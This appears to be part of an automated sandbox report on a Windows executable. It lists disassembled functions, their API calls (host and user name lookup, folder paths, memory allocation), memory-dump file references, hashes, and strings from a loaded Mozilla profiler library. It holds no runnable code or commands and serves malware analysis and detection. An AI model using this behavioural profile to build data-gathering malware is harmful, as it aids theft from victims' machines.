Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 250cbd12eb5656963cd07ab24a5eae0feb5c1f52430acbb4be114995da0735df
Instruction ID: 44e3d10a061a9081168e1cce2e2afc61d874f55b65dd03eb1b4536845b3b99b4
Opcode Fuzzy Hash: 250cbd12eb5656963cd07ab24a5eae0feb5c1f52430acbb4be114995da0735df
Instruction Fuzzy Hash: 1001CC76514108A7CB94F760DC4ADEE733C9B54340F008554B64A52181EE78AA88CBD3

Function 007610A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007610B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007610F7

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: fb5d398cd52c46e274b69bca87194d916abb82132435f9fd06c2ec81688a7f48
Instruction ID: 6a8cf257a28e6dab97dd1af750eb7b19b1a32be523f4bb5b59e07cb0cf0189f6
Opcode Fuzzy Hash: fb5d398cd52c46e274b69bca87194d916abb82132435f9fd06c2ec81688a7f48
Instruction Fuzzy Hash: BAF0E971641204BBEB1496A49C4DFBBB7DCD705715F300444F905E3280D6755E00DA91

Function 00778D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00761B54,?,?,0078564C,?,?,00780E1F), ref: 00778D9F

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8c38f2e4275dcf182708401aa19a8ccc84c3bb11070c2a21fb3879194120085c
Instruction ID: 7605bfbc3809a8f367df1fb6552083007fa10ed6cae20937f5b4db813d509b56
Opcode Fuzzy Hash: 8c38f2e4275dcf182708401aa19a8ccc84c3bb11070c2a21fb3879194120085c
Instruction Fuzzy Hash: 13F01570D00208FBDF10EFA4D5496EDBB74EB15350F10C1A9E82A673C0DB385A55DB82

Function 00778DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00778E0B

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: f133a902ccde59786ffd0a1312d043aad12274c28557e648e9245c4c59eba1ff
Instruction ID: 0e32c25f46a6a33cffdbae38e0a84ee4337c19257233926b9231e38bf1b95a5e
Opcode Fuzzy Hash: f133a902ccde59786ffd0a1312d043aad12274c28557e648e9245c4c59eba1ff
Instruction Fuzzy Hash: 39E0123194034CBBDB91DB54CC96FAD737C9B44B01F004295BA0C5A1C0DE74AB858B91

Function 00761190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 007778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00777910
Part of subcall function 007778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00777917
Part of subcall function 007778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0077792F

Part of subcall function 00777850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007611B7), ref: 00777880
Part of subcall function 00777850: RtlAllocateHeap.NTDLL(00000000), ref: 00777887
Part of subcall function 00777850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0077789F

ExitProcess.KERNEL32 ref: 007611C6

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 8c5393beb096ccf8c54734da942429833d7b566256588bbd39c4c636a8a9e6e5
Instruction ID: 36abb985673a93c5210745fb7e404dea78b7e213d42b2ae371d50365f725d7c5
Opcode Fuzzy Hash: 8c5393beb096ccf8c54734da942429833d7b566256588bbd39c4c636a8a9e6e5
Instruction Fuzzy Hash: 35E0ECA596820593CE4477B0EC0EB2A329C5B16385F488424BA0992512FE2DE800D9AB

Function 00778E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 00778E52

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 073f3afd228dbe00ac834bdecf5cfe970cba3943fd342cc260b6959183304a9d
Instruction ID: 2fc3a639581dcd8e6acb60603ab7b1f618ad50c9db04e98b0b6e3cb2e6506e88
Opcode Fuzzy Hash: 073f3afd228dbe00ac834bdecf5cfe970cba3943fd342cc260b6959183304a9d
Instruction Fuzzy Hash: D401FB30A44148EFCF44CF98C5897AC7BB1EF04348F28C098D9096B351C7B95E84DB86

Non-executed Functions

Function 6CBA5440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CBA5492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CBA54A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CBA54BE
__Init_thread_footer.LIBCMT ref: 6CBA54DB

Part of subcall function 6CBCAB3F: EnterCriticalSection.KERNEL32(6CC1E370,?,?,6CB93527,6CC1F6CC,?,?,?,?,?,?,?,?,6CB93284), ref: 6CBCAB49
Part of subcall function 6CBCAB3F: LeaveCriticalSection.KERNEL32(6CC1E370,?,6CB93527,6CC1F6CC,?,?,?,?,?,?,?,?,6CB93284,?,?,6CBB56F6), ref: 6CBCAB7C

Part of subcall function 6CBCCBE8: GetCurrentProcess.KERNEL32(?,6CB931A7), ref: 6CBCCBF1
Part of subcall function 6CBCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CB931A7), ref: 6CBCCBFA

GetCurrentThreadId.KERNEL32 ref: 6CBA54F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6CBA5516
GetCurrentThreadId.KERNEL32 ref: 6CBA556A
AcquireSRWLockExclusive.KERNEL32(6CC1F4B8), ref: 6CBA5577
moz_xmalloc.MOZGLUE(00000070), ref: 6CBA5585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6CBA5590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6CBA55E6
ReleaseSRWLockExclusive.KERNEL32(6CC1F4B8), ref: 6CBA5606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBA5616

Part of subcall function 6CBCAB89: EnterCriticalSection.KERNEL32(6CC1E370,?,?,?,6CB934DE,6CC1F6CC,?,?,?,?,?,?,?,6CB93284), ref: 6CBCAB94
Part of subcall function 6CBCAB89: LeaveCriticalSection.KERNEL32(6CC1E370,?,6CB934DE,6CC1F6CC,?,?,?,?,?,?,?,6CB93284,?,?,6CBB56F6), ref: 6CBCABD1

GetCurrentThreadId.KERNEL32 ref: 6CBA563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBA5646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6CBA567C
free.MOZGLUE(?), ref: 6CBA56AE

Part of subcall function 6CBB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CBB5EDB
Part of subcall function 6CBB5E90: memset.VCRUNTIME140(6CBF7765,000000E5,55CCCCCC), ref: 6CBB5F27
Part of subcall function 6CBB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CBB5FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6CBA56E8
GetCurrentThreadId.KERNEL32 ref: 6CBA5707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6CBA570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6CBA5729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6CBA574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6CBA576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6CBA5796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6CBA57B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6CBA57CA

Strings

[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6CBA5717
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6CBA5D24
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CBA54A3
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6CBA5D2B
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6CBA584E
MOZ_BASE_PROFILER_LOGGING, xrefs: 6CBA54B9
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6CBA5BBE
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6CBA5766
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6CBA5B38
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6CBA57AE
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6CBA5D01
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6CBA5D1C
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6CBA5AC9
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6CBA5CF9
MOZ_PROFILER_STARTUP, xrefs: 6CBA55E1
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6CBA56E3
[I %d/%d] profiler_init, xrefs: 6CBA564E
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6CBA57C5
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6CBA5791
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CBA548D
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6CBA5724
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6CBA5C56
MOZ_BASE_PROFILER_HELP, xrefs: 6CBA5511
GeckoMain, xrefs: 6CBA5554, 6CBA55D5
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6CBA5749

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 627b014f5b35808323b5fbbfc06ebe8b20af95b298467aeb2126c9a0d2365979
Instruction ID: 4edf821acaca8e6be5477dd109f7f5fc21e37e06b5745988b78e77ea13957b3b
